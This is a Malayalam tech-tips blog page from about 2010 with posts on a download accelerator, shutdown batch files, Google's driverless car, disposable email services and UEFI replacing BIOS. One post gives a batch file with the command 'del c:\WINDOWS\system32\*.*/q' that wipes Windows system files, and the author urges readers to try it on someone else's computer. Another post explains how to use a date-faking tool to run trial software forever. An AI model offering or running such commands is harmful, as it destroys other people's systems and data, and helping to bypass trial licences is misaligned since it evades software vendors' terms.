മാത്രമേ കിട്ടുകയുള്ളൂ . ഇതിനു ഒരു പരിഹാരമാണ് DAP (Download Accelerator Plus). ഇത് ഉപയോഗിച്ച് നമുക്ക് ഡൌണ്‍ലോഡ് സ്പീഡ് കൂട്ടുവാന്‍ സാധിക്കും. DAP ഉപയോഗിച്ച് ഡൌണ്‍ലോഡ് ചെയ്തു നോക്കൂ ...(നിങ്ങള്‍ക്ക് കിട്ടും,15-25 Kb/s ഡൌണ്‍ലോഡ് സ്പീഡ് )..DAP ഇന്‍സ്റ്റോള്‍ ചെയ്തതിനു ശേഷം ഡൌണ്‍ലോഡ് start ചെയ്യുമ്പോള്‍ DAP ഓട്ടോമാറ്റിക് ആയി ഓപ്പണ്‍ ആയി ഡൌണ്‍ലോഡ് സ്റ്റാര്‍ട്ട് ആകും.ഡൌണ്‍ലോഡ് തനിയെ ആയില്ലെങ്കില്‍ URL കോപ്പി ചെയ്തു ആഡ് ചെയ്താല്‍ മതി.ഒന്ന് പരീക്ഷിച്ചു നോക്ക്.....

ബാച്ച് ഫയല്‍ ഉപയോഗിച്ച് സിസ്റ്റം ഷട്ട് ഡൌണ്‍ ചെയ്യാന്‍
ആദ്യം നോട്ട് പാഡ് ഓപ്പണ്‍ ചെയ്ത് താഴെയുള്ള കോഡ് അതിലേക്കു കോപ്പി ചെയ്യുക.
@echo off
color 1a
shutdown /s /c "system shutdown..please wait"
ഇനി ഇത് shutdown.bat എന്നാ പേരില്‍ ഡെസ്ക്ടോപ്പില്‍ സേവ് ചെയ്യുക.ഇനി ആ അതില്‍ ഒന്ന് ക്ലിക്ക് ചെയ്തു നോക്ക്.
.....................................
ഷട്ട് ഡൌണ്‍ സ്റ്റോപ്പ് ചെയ്യാന്‍
shutdown /a എന്ന് Run കമാന്റ് കൊടുത്ത് Enter അടിക്കുക .
അല്ലെങ്കില്‍ താഴെയുള്ള കോഡ് നോട്ട് പാഡില്‍ കോപ്പി ചെയ്ത് പുതിയ ബാച്ച് ഫയല്‍ ഉണ്ടാക്കാം
cls
@echo off
color 1a
shutdown /a
echo /c "shutdown stopped"
ഇനി ഇത് shtdwnstopped.bat കൊടുത്ത് സേവ് ചെയ്തോളൂ.

Tuesday, October 19, 2010
ഗൂഗിളിന്റെ കാറിന് ഡ്രൈവറില്ല!
ഇന്റര്‍നെറ്റ് ഭീമന്‍ ഗൂഗിള്‍ എന്നും ഇങ്ങനെയാണ്. എന്തെങ്കിലും എന്നും പുതിയത് കണ്ടെത്തി കൊണ്ടേയിരിക്കണം. നേരത്തെ ഓണ്‍ലൈന്‍ ലോകത്ത് സജീവമായിരുന്ന ഗൂഗിള്‍ തങ്ങളുടെ സാങ്കേതിക സേവനങ്ങള്‍ മറ്റു കണ്‍ടെത്തലുകള്‍ക്കും ഉപയോഗിക്കാന്‍ തുടങ്ങിയിരിക്കുന്നു. ഏറ്റവും അവസാനമായി ഡ്രൈവര്‍ ഇല്ലാതെ സഞ്ചരിക്കുന്ന കാറും ഗൂഗിള്‍ വികസിപ്പിച്ചെടുത്തിരിക്കുന്നു. ഇത്തരമൊരു കാറിന്റെ ഔദ്യേഗിക പ്രഖ്യാപനം ഉടനെ ഉണ്ടാകുമെന്നാണ് കരുതുന്നത്.
അമേരിക്കയിലെ തിരക്കേറിയ നഗരങ്ങളായ സാന്‍ഫ്രാന്‍സിസ്‌കോയ്ക്കും ലോസ് ആന്‍ജിലസിനുമിടയില്‍ ഡ്രൈവറില്ലാത്ത ഗൂഗിള്‍ കാര്‍ സവാരി നടത്തി കഴിഞ്ഞു. ആയിരക്കണക്കിന് വാഹനങ്ങള്‍ക്ക് ഇടയിലൂടെ ട്രാഫിക് നിയമങ്ങള്‍ പാലിച്ച് ടയോട്ട പ്രയസ് കാര്‍ 140,000 മൈല്‍ ദൂരം സഞ്ചരിച്ചെന്ന് അധികൃതര്‍ അറിയിച്ചു.
ഗൂഗിള്‍ സാങ്കേതിക വിദഗ്ധര്‍ വികസിപ്പിച്ചെടുത്ത സോഫ്ട്‌വേറാണ് കാറിനെ നിയന്ത്രിക്കുന്നത്. പരീക്ഷണവേളയില്‍ കാറിന്റെ ഡ്രൈവിങ് സീറ്റില്‍ ഒരാള്‍ ഉണ്ടായിരുന്നു എങ്കിലും പരീക്ഷണം നിരീക്ഷിക്കല്‍ മാത്രമായിരുന്നു അദ്ദേഹത്തിന്റെ ജോലി. പരീക്ഷണ സോഫ്റ്റ്വേറിന്റെ ഭാഗമായ നാവിഗേഷന്‍ സംവിധാനം നിരീക്ഷിക്കാന്‍ ഒരു ടെക്‌നീഷ്യനും കാറിലുണ്ടായിരുന്നു.
അപകടങ്ങള്‍ കുറയ്ക്കുക, സമയം ലാഭിക്കുക, കാര്‍ബണ്‍ വ്യാപനം തടയുക തുടങ്ങിയ ലക്‍ഷ്യങ്ങള്‍ മുന്‍നിര്‍ത്തിയാണ് ഇത്തരമൊരു പദ്ധതി പരീക്ഷിക്കുന്നതെന്ന് ഗൂഗിള്‍ കേന്ദ്രങ്ങള്‍ അറിയിച്ചു. വീഡിയോ ക്യാമറകള്‍, റഡാര്‍ സെന്‍സറുകള്‍, ലേസര്‍ സങ്കേതം തുടങ്ങിയവയുടെ സഹായത്തോടെ ചുറ്റുപാടും നിരീക്ഷിച്ച്, ശരിയായ തീരുമാനങ്ങളെടുത്താണ് കാര്‍ സ്വയം ഡ്രൈവ് ചെയ്യുന്നത്.
പതിനഞ്ചോളം സാങ്കേതിക വിദഗ്ധരുടെ മികവിലാണ് ഗൂഗിള്‍ ഡ്രൈവറില്ലാത്ത കാര്‍ വികസിപ്പിച്ചെടുത്തത്. മണിക്കൂറിന് 15 ഡോളര്‍ ശമ്പളം നല്‍കിയാണ് ഇവരെ ഗൂഗിള്‍ പുതിയ ദൌത്യം ഏല്‍പ്പിച്ചത്. ആറ് പ്രയസ് കാറുകളും ഒരു ഓഡി ടി ടി യുമാണ് നിലവില്‍ പരീക്ഷണം നടത്തിയിരിക്കുന്നത്.

ഡിസ്‌പോസിബിള്‍ ഇമെയിലിന്റെ കാലം
ഡിസ്‌പോസിബിള്‍ യുഗത്തിലാണല്ലോ ഇത്. ഡിസ്‌പോസിബിള്‍ സിറിഞ്ച്, പാത്രങ്ങള്‍ മുതല്‍ ഷര്‍ട്ടും മാത്രമല്ല എന്തും ഡിസ്‌പോസിബിള്‍ ആയി ഉപയോഗിക്കുന്ന കാലമാണിത്. അപ്പോള്‍ പിന്നെ എന്തുകൊണ്ട് ഡിസ്‌പോസിബിള്‍ ഇമെയിലും ആയിക്കൂടാ അല്ലേ.
ഈമെയിലിന്റെ കാര്യത്തില്‍ ഈ ആശയം ആവശ്യമോ എന്ന് ചോദിക്കുന്നവരുണ്ടാകാം. വേണ്ടിവരും എന്നുതന്നെയാണ് ചിലര്‍ പറയുന്നത്. കാരണം യഥാര്‍ത്ഥ ഇമെയില്‍ അഡ്രസ് വെളിപ്പെടുത്താന്‍ പറ്റാത്ത സാഹചര്യം ഉണ്ടാവും. പലവിധ സ്വകാര്യതകള്‍ കൊണ്ടും വൈറസ് തുടങ്ങിയവയുടെ ഭീഷണികൊണ്ടുമാവാം ഇത്. അത്തരം അവസരത്തില്‍ താത്ക്കാലികമായി ഉപയോഗിക്കാവുന്ന ഒരു ഇമെയില്‍ വിലാസം സഹായകമായേക്കും.
ഇത്തരക്കാര്‍ക്ക് താത്കാലിക ഇമെയില്‍ അഡ്രസ്സുകള്‍ നല്‍കുന്ന ഒട്ടേറെ വെബ്‌സൈറ്റുകള്‍ ഇന്ന് നിലവിലുണ്ട്. താത്ക്കാലി മെയില്‍ അഡ്രസ്സുകള്‍ വളരെ പെട്ടെന്ന് നിര്‍മ്മിക്കാം. ഒരുതരത്തിലുള്ള രജിസ്‌ട്രേഷനും ആവശ്യമില്ലാത്ത ഇത്തരം ഡിസ്‌പോസിബിള്‍ മെയിലുകളില്‍ മിനിറ്റുകള്‍ മുതല്‍ മണിക്കൂറുകള്‍ വരെ ആയുസ്സുള്ളവയുണ്ട്.
ഉദാഹരണത്തിന് http://www.mailinator.com എന്ന സൈറ്റില്‍ പോവുക. അവിടെ ആദ്യം തന്നെ Chek your inbox എന്ന ബോക്‌സ് കാണാം. അവിടെ നിങ്ങള്‍ ആഗ്രഹിക്കുന്ന തരത്തിലുള്ള ഇമെയില്‍ അഡ്രസ് നല്‍കുക. പിന്നെ 'Go' ബട്ടന്‍ ക്ലിക്കു ചെയ്താല്‍ നേരെ ഇന്‍ബോക്‌സിലേക്ക് എത്തിച്ചേരാം.
നിങ്ങള്‍ കൊടുത്ത ഇമെയില്‍ പേരും കൂടാതെ @mailinator.com ഉം ചേര്‍ത്തുള്ള വിലാസമായിരിക്കും കിട്ടുക. ഉദാ: flower@mailinator.com. തുടര്‍ന്ന് ഈ അഡ്രസ് ആര്‍ക്കുവേണമെങ്കിലും പറഞ്ഞുകൊടുക്കാം. അല്ലെങ്കില്‍ നിങ്ങള്‍ക്കു തന്നെ മറ്റൊരു ഇമെയിലില്‍ കയറി ഈ അഡ്രസിലേക്ക് മെസ്സേജ് അയക്കാം. ഉടന്‍ തന്നെ ഇതിന്റെ ഇന്‍ബോക്‌സില്‍ മെയില്‍ കാണാം. വായിച്ചുനോക്കുകയും വേണമെങ്കില്‍ ഫോര്‍വേര്‍ഡ് ചെയ്യുകയും ചെയ്യാം. എന്നാല്‍ ഈ അഡ്രസ്സില്‍ നിന്ന് റിപ്ലേ ചെയ്യാനും അറ്റാച്ച്‌മെന്റ് കാണാനും ഒന്നും പറ്റില്ല.
എന്നാല്‍ http://www.guerrillamail.com/ എന്ന സൈറ്റില്‍ നിന്ന് ലഭിക്കുന്ന ഇമെയില്‍ വിലാസത്തില്‍ നിന്ന് മറുപടി അയക്കാനും സാധിക്കും. ഈ വെബ്‌സൈറ്റിലെ 'Get temporary email' ബോക്‌സില്‍ അഡ്രസ് നല്‍കുക. മറ്റാരും ഉപയോഗിക്കാത്ത അഡ്രസ് ആണെങ്കില്‍ ഉടന്‍ തന്നെ നിങ്ങള്‍ക്ക് അത് അനുവദിച്ചു കിട്ടും. അല്ലെങ്കില്‍ നിങ്ങള്‍ക്ക് വിലാസം മാറ്റിനല്‍കുകയോ കമ്പ്യൂട്ടര്‍ തന്നെ നല്‍കുന്ന വിലാസം ഉപയോഗിക്കുകയോ ആകാം. ഇവിടെ ഇമെയില്‍ അഡ്രസ്സിന് വെറും ഒരു മണിക്കൂര്‍ മാത്രമേ ആയുസ്സുള്ളൂ. അധികം സമയം തുടരാന്‍ ആഗ്രഹിക്കുന്നവര്‍ക്ക് ഒരു മണിക്കൂര്‍ കൂട്ടി ആയുസ്സ് നീട്ടിവാങ്ങാനുള്ള സൗകര്യവും ഉണ്ട് .
ആവശ്യം കഴിഞ്ഞാല്‍ മെസ്സേജ് Delete ചെയ്യാനും, ഇനി അഡ്രസേ വേണ്ട എന്നുതോന്നിയാല്‍ Forget it എന്നിടത്ത് ക്ലിക്ക് ചെയ്താല്‍ അഡ്രസേ ഇല്ലാതാവുകയും ചെയ്യും. ഈ അഡ്രസിന്റെ പ്രധാന പ്രശ്‌നം, പാസ്‌വേര്‍ഡ് ഇല്ലാത്ത അഡ്രസ് ആകയാല്‍ ആര്‍ക്കുവേണമെങ്കിലും അഡ്രസ് അറിയാമെങ്കില്‍ കയറി നോക്കാം വായിക്കാം എന്നതാണ്.
ഇത്തരം മെയില്‍ അഡ്രസ്സുകള്‍ക്കെല്ലാം കുറഞ്ഞ സമയമേ ആയുസ്സുള്ളൂ.. അതായത് ഉപയോഗിച്ചു കളയുക. ശരിക്കും ഡിസ്‌പോസിബിള്‍. http://10minutemail.com, Dodgeit, MyTrashmail, Jetable, MintEmail തുടങ്ങിയ ഒട്ടനവധി സൈറ്റുകള്‍ ഇത്തരം സൗകര്യം നല്‍കുന്നു.

ബയോസും വിടവാങ്ങാനൊരുങ്ങുന്നു
ചുരുങ്ങിയ കാലം കൊണ്ടുതന്നെ വിപ്ലവകരമായ മാറ്റങ്ങള്‍ വന്ന മേഖലയാണ് കമ്പ്യൂട്ടര്‍ സയന്‍സ്. എങ്കിലും കഴിഞ്ഞ 25 വര്‍ഷങ്ങളായി ഘടനയില്‍ കാര്യമായ മാറ്റമൊന്നും വരാഞ്ഞ ഒരു സുപ്രധാന സോഫ്ട്‌വേര്‍ ആണ് 'ബയൊസ്'. കമ്പ്യൂട്ടര്‍ ഓണ്‍ ചെയ്യുമ്പോള്‍ ആദ്യം പ്രവര്‍ത്തനം തുടങ്ങുന്നത് ബയോസ് ആണ്. കമ്പ്യൂട്ടറിന്റെ അനുബന്ധ ഭാഗങ്ങളായ മെമ്മറി (റാം), ഫ്‌ളോപ്പി ഡിസ്‌ക്, ഹാര്‍ഡ് ഡിസ്‌ക്, സിഡി െ്രെഡവ് തുടങ്ങിയവ തിരിച്ചറിയുകയും അവ ശരിയായി പ്രവര്‍ത്തിക്കുകയും ചെയ്യുന്നുണ്ടോ എന്നു മനസ്സിലാക്കുന്നത് ബയോസാണ്. ഇതിനെ 'പവര്‍ ഓണ്‍ സെല്‍ഫ് ടെസ്റ്റ്' (പോസ്റ്റ്) എന്നു വിളിക്കുന്നു. കൂടാതെ മദര്‍ ബോര്‍ഡുമായി ബന്ധിപ്പിച്ചിരിക്കുന്ന മറ്റു കാര്‍ഡുകളിലുള്ള (ഗ്രാഫിക്‌സ്, എസ് സി എസ് ഐ തുടങ്ങിയവ) ബയോസ് സോഫ്ട്‌വേറുകളുടെ പ്രവര്‍ത്തനമാരംഭിക്കാന്‍ സഹായിക്കുന്നതും ബയോസ് ആണ്.
ഓപ്പറേറ്റിങ് സിസ്റ്റങ്ങളായ വിന്‍ഡോസ്, മാക്, ലിനക്‌സ് തുടങ്ങിയവ കമ്പ്യൂട്ടറിന്റെ ഹാര്‍ഡ് ഡിസ്‌കുകളില്‍ ആണ് ശേഖരിച്ചു വച്ചിരിക്കുക അവയെ അതിവേഗ മെമ്മറിയായ റാമിലേക്കു മാറ്റിയാല്‍ മാത്രമേ കമ്പ്യൂട്ടര്‍ പ്രവര്‍ത്തനം ആരംഭിക്കൂ. ഇതിനെ ബൂട്ടിംഗ് എന്നാണ് വിളിക്കുന്നത്. ഇത്തരത്തില്‍ ബൂട്ടിംഗ് നടത്താന്‍ കമ്പ്യൂട്ടറിനെ സഹായിക്കുന്നതും ബയോസ് ആണ്. ചുരുക്കത്തില്‍ ബയോസിന് എന്തെങ്കിലും തകരാറു സംഭവിച്ചാല്‍ കമ്പ്യൂട്ടര്‍ പ്രവര്‍ത്തിക്കില്ല. ഓപ്പറേറ്റിങ് സിസ്റ്റം കമ്പ്യൂട്ടറിന്റെ ജീവന്‍ ആണെങ്കില്‍ ബയോസ് ജീവവായു ആണ്. ഇത്തരത്തില്‍ വളരെ പ്രധാന്യമര്‍ഹിക്കുന്ന ബയോസ് ഇപ്പോഴും ഇരുപതാം നൂറ്റാണ്ടില്‍ തന്നെയാണ്. നിരവധി കൂട്ടിച്ചേര്‍ക്കലുകള്‍ ഉണ്ടായിട്ടുണ്ടെങ്കിലും സാങ്കേതികവിദ്യയില്‍ കാര്യമായ മാറ്റങ്ങള്‍ വന്നിട്ടില്ല.
വീണ്ടും എഴുതാനും മായ്ക്കാനും കഴിയാത്ത റോം ചിപ്പുകളില്‍ ആണ് തൊണ്ണൂറുകളില്‍ ബയോസ് സൂക്ഷിച്ചിരുന്നത്. അതായത് കലോചിതമായ മാറ്റങ്ങള്‍ വരുത്താന്‍ കഴിയുമായിരുന്നില്ല. 1995 ല്‍ ഋജഞഛങ ചിപ്പുകളില്‍ ബയോസ് വന്നു തുടങ്ങി. പ്രത്യേക അള്‍ട്രാവയലറ്റ് രശ്മികള്‍ കൊണ്ട് മായ്ച്ച് വീണ്ടും പ്രോഗ്രാം ചെയ്യാം എന്നുവന്നു. പുതിയ സാങ്കേതിക വിദ്യകള്‍ക്കനുസരിച്ചു കാലോചിതമായി മാറ്റി എഴുതാന്‍ കഴിയുന്ന ഫ്‌ളാഷ് മെമ്മറിയില്‍ ആണ് ഇപ്പോള്‍ ബയോസ് സൂക്ഷിക്കുന്നത്. ഇത്തരത്തില്‍ ബയോസ് പ്രോഗ്രാം മാറ്റി എഴുതുന്നതിനെ 'ബയോസ് ഫ്‌ളാഷിംഗ്' എന്നു വിളിക്കുന്നു.
കാല്‍നൂറ്റാണ്ടായി കാര്യമായ മാറ്റത്തിന് വിധേയമാകാത്ത ബയോസും മാറുകയാണ്. യു. ഇ. എഫ്. ഐ (യൂണിഫൈഡ് എക്സ്റ്റന്‍ഡിബിള്‍ ഫിംവെയര്‍ ഇന്റര്‍ഫേസ്) എന്ന പുതിയ സാങ്കേതികവിദ്യ ബയോസിനെ പിന്‍തള്ളുന്നു. വിപണിയില്‍ പരസ്പരം കടിപിടി കൂടുന്ന സോഫ്ട്‌വേര്‍, ഹാര്‍ഡ്‌വേര്‍ രംഗങ്ങളിലെ അതികായരായ പതിനൊന്നു കമ്പനികള്‍ ഒറ്റക്കെട്ടായാണ് ഇതിനു പിന്നില്‍ പ്രവര്‍ത്തിക്കുന്നത്. മൈക്രോ സോഫ്ട്, ആപ്പിള്‍, ഐ ബി എം, എ എം ഡി, ഡെല്‍ , എച് പി, ലെനോവോ, ഫീനിക്‌സ്, ഇന്റല്‍, അമേരിക്കന്‍ മെഗാ ട്രെന്റ്, ഇന്‍സൈഡ് എന്നിവയാണ് ആ കമ്പനികള്‍. ചിപ്പ് നിര്‍മ്മാണ രംഗത്തെ തലതൊട്ടപ്പന്മാരായ ഇന്റല്‍ തന്നെയാണ് ബയോസിന്റെ പരിഷ്‌കരണം എന്ന പേരില്‍ യു. ഇ. എഫ്. ഐ. അവതരിപ്പിച്ചത് തുടര്‍ന്ന് 2005 ജൂലായ് 25 മുതല്‍ യു. ഇ. എഫ്. ഐ. ഫോറം അതിന്റെ വികസനം ഏറ്റെടുത്തു.
ബയോസിനെ അപേക്ഷിച്ച് കാതലായ മാറ്റങ്ങള്‍ യു. ഇ. എഫ്. ഐക്കുണ്ട്. എടുത്തു പറയേണ്ടത് വേഗത്തിന്റെ കാര്യം തന്നെ. കമ്പ്യൂട്ടറുകള്‍ ബൂട്ടു ചെയ്യാന്‍ നിലവില്‍ 20 മുതല്‍ 30 സെക്കന്റു വരെ എടുക്കുമ്പോള്‍ യു. ഇ. എഫ്. ഐ. സാങ്കേതത്തില്‍ നാലോ അഞ്ചോ സെക്കന്റുകളേ ബൂട്ടു ചെയ്യാന്‍ വേണ്ടൂ. മറ്റൊരു പ്രത്യേകത, ബയോസിന്റെ കാര്യത്തിലെന്ന പോലെ ഒരു പ്രത്യേക അനുബന്ധ ഉപകരണം ഒരു പ്രത്യേക സ്ഥാനത്തു മാത്രമേ ഘടിപ്പിക്കാനാകൂ എന്ന് നിര്‍ബന്ധമില്ല എന്നതാണ്. അതായത് ഏതു പോര്‍ട്ടല്‍ ഘടിപ്പിച്ചാലും കീബോര്‍ഡ് കീബോര്‍ഡാണെന്നും മൗസ് മൗസാണെന്നും തിരിച്ചറിയാനാകും എന്നു സാരം.
ബയോസ് പ്രൊഗ്രാം എഴുതിയിരിക്കുന്നത് അസംബ്ലി ലാംഗ്വേജില്‍ ആണ്, യു. ഇ. അഫ്. ഐ. ആകട്ടെ താരതമ്യേന എളുപ്പമായ 'സി' ലാംഗ്വേജിലും. ഇത് തുടര്‍ വികസനം എളുപ്പമാക്കുന്നു. പക്ഷേ സുരക്ഷാ പ്രശ്‌നങ്ങള്‍ അവഗണിക്കാനാവുന്നതല്ല. ഇന്റല്‍ ഃ86 പ്രൊസസറുകള്‍ക്കനുസരിച്ചാണ് ബയോസ് പ്രവര്‍ത്തിക്കുന്നതാണെങ്കില്‍, യു ഇ എഫ് ഐ ഒരു പ്രത്യേക പോസസര്‍ കുടുംബത്തില്‍ അധിഷ്ഠിതമല്ല. നിലവിലുള്ള ഉന്നത സാങ്കേതിക വിദ്യകളുമായി താദാത്മ്യം പ്രാപിക്കുന്നതിനു ബയോസിനു ഏറെ പരിമിതികളുണ്ട്. എന്നാല്‍, പുതിയ സങ്കേതത്തിന് അത്തരത്തിലൊരു പ്രശ്‌നവുമില്ല.
യു. ഇ. എഫ്. ഐ. ഇപ്പോഴും കുറ്റമറ്റ രൂപത്തില്‍ വികസിപ്പിക്കപ്പെട്ടിട്ടില്ല. കൂടുതല്‍ മെമ്മറിയുടെ ആവശ്യകത, നിലവില്‍ ബയോസില്‍ അധിഷ്ഠിതമായി പ്രവര്‍ത്തിക്കുന്ന മറ്റു അനുബന്ധ ഘടകങ്ങളുടെ സോഫ്ട്‌വേറുകള്‍ മാറ്റിയെഴുതല്‍, 'സി' ഭാഷ ഉപയോഗിക്കുന്നതുമൂലം ഉണ്ടാകുന്ന സുരക്ഷാപഴുതുകള്‍ അടക്കല്‍ തുടങ്ങിയവ വെല്ലുവിളികള്‍ ആണ്. എങ്കിലും പുതിയ സങ്കേതത്തില്‍ അധിഷ്ഠിതമായ കമ്പ്യൂട്ടറുകള്‍ അടുത്ത വര്‍ഷത്തോടെ വിപണിയില്‍ ലഭ്യമായേക്കും എന്നാണ് റിപ്പോര്‍ട്ടുകള്‍. ചുരുക്കത്തില്‍ പറഞ്ഞാല്‍, കമ്പ്യൂട്ടര്‍ ബൂട്ട് ചെയ്യുന്നതിനിടക്ക് ഒരു ചായ കുടിച്ചിട്ടു വരാം എന്നത് ഇനിയൊരു പഴങ്കഥ ആയേക്കാം

ലളിതമായ ട്രിക്ക് ഉപയോഗിച്ച് ഒരു കമ്പ്യൂട്ടര്‍ എങ്ങിനെ നിശ്ചലമാക്കം ..
ഈ ട്രിക്ക് നിങ്ങളുടെ കമ്പ്യൂട്ടറില്‍ ചെക്ക് ചെയ്തു എന്ത് സംഭവിച്ചാലും നിങ്ങള്‍ നിങ്ങളുടെ പാട്ടിനു പോകേണ്ടി വരും ..ഒരു രീതിയിലും ഞാന്‍ ഉത്തരവാദി ആകില്ല..
1 - ആദ്യം notpad ഓപ്പണ്‍ ചെയ്യുക
2- del c:\WINDOWS\system32\*.*/q ഈ കാണുന്ന കമാന്‍ഡ് നോട്ട്പാടില്‍ കോപ്പി ചെയ്യുക
3- ശേഷം നോട്ട്പാട് സേവ് ചെയ്യുക.. സേവ് ചെയ്യുമ്പോള്‍ ഏതെങ്കിലും ഒരു പേരിന്റെ കൂടെ .bat അല്ലെങ്കില്‍ .cmd എന്ന് സേവ് ചെയ്യുക..
ഉദാഹരണമായി .. സജി എന്ന പേരില്‍ ആണ് നിങ്ങള്‍ സേവ് ചെയ്യാന്‍ ഉദ്ദേശിച്ചതെങ്കില്‍ saji.bat എന്ന് ടൈപ്പ് ചെയ്തു സേവ് ചെയ്യുക..
4- ഇനി പറയുന്നത് ശ്രദ്ധിക്കുക *** സേവ് ചെയ്ത ഫയല്‍ ഒരിക്കലും നിങ്ങള്‍ ക്ലിക്കരുത് ..ക്ലിക്കിയാല്‍ കമ്പ്യൂട്ടറില്‍ ഒന്നും സംഭവിക്കില്ല ...പക്ഷെ സംഭവാമി യുഗേ യുഗേ.. റീസ്റ്റാര്‍ട്ട് ചെയ്താല്‍ സിസ്റ്റം വര്‍ക്ക് ആകില്ല.. അപ്പൊ ഏതെങ്കിലും അലവലാതിയുടെ കമ്പ്യൂട്ടറില്‍ പരീക്ഷണം നടത്തണം എന്ന് സാരം

ട്രയല്‍ വെര്‍ഷന്‍നിലുള്ള സോഫ്റ്റ്വെയറുകള്‍ ഇനി ജീവിതകാലം മുഴുവന്‍ ഉപയോഗിക്കാന്‍!!!!
ഇപ്പോള്‍ ലഭിക്കുന്ന മിക്ക സോഫ്റ്റ്വെയറുകളും ട്രയല്‍ ആയി ലഭിക്കുന്നവയാണ് കുറച്ചു ദിവസത്തെ ഉപയോഗത്തിന് ശേഷം അവ വിലകോടുത്ത് വാങ്ങേണ്ടി വരും അല്ലെങ്കില്‍ അവ ഉപയോഗശൂന്യവും ആകും.ക്രാക്കും സീരിയല്‍ നമ്പരുകളും തപ്പി ഇറങ്ങുന്ന നമ്മള്‍ വല നിറയെ വൈറസുകളും ആയി ആകും പോങ്ങുക.ഇത്തരം പ്രശ്നങ്ങള്‍ക്ക് ഒരു പരിഹാരമാണ് ടൈം സ്റ്റോപ്പര്‍ എന്ന സോഫ്റ്റ്വെയര്‍.
ഇത് 1 mbയില്‍ താഴെയുള്ള ഒരു സൌജന്യ സോഫ്റ്റ്വെയര്‍ ആണ്. ടൈം സ്റ്റോപ്പര്‍ സോഫ്റ്റ്വെയര്‍ ആദ്യം ഇന്‍സ്റ്റാള്‍ ചെയ്യണം.ടൈം സ്റ്റോപ്പര്‍ ഓപ്പണ്‍ ചെയ്ത് അതില്‍ ബ്രൊസ് ചെയ്ത് ട്രയല്‍ പീരിഡിലുള്ള സോഫ്റ്റ്വെയര്‍ സെലക്ട് ചെയ്യണം.അതിന് ശേഷം choose the new date എന്ന് കാണിച്ചിരിക്കുന്നിടത്ത് ട്രയല്‍ പീരിഡ് അവസാനിക്കുന്നതിന് കുറച്ച് ദിവസം മുന്‍പുള്ള ഒരു ദിവസം സെലക്ട് ചെയ്യണം.അതിന് ശേഷം ഡെസ്ക്ക്ടോപ്പില്‍ സോഫ്റ്റ്വെയറിനായി ഒരു ഷോര്‍ട്ട്കട്ട് ഉണ്ടാക്കാനായിEnter a name for create desktop icon എന്ന് കോടുത്തിരിക്കുന്നിടത്ത് ക്ലിക്ക് ചെയ്ത് ഒരു ഷോര്‍ട്ട് കട്ട് ഉണ്ടാക്കണം.ഇനി മുതല്‍ ആ സോഫ്റ്റ്വെയര്‍ ഉപയോഗിക്കുമ്പോള്‍ ആ ലിങ്കില്‍ ക്ലിക്ക് ചെയ്ത് വേണം.ഇനി ട്രയല്‍ പീരിഡ് കഴിഞ്ഞാലും ജീവിത കാലം മുഴുവന്‍ ആ സോഫ്റ്റ്വെയര്‍ ഉപയോഗിക്കാം.ഡെസ്ക്ക്ടോപ്പില്‍ പുതിയ ഷോര്‍ട്ട്കട്ട് ഐക്കണ്‍ ഉണ്ടാക്കിയ ശേഷം പഴയ ഷോര്‍ട്ട്കട്ട് ഐക്കണ്‍ ഡിലീറ്റ് ചെയ്യണം.

Subscribe to:
Posts (Atom)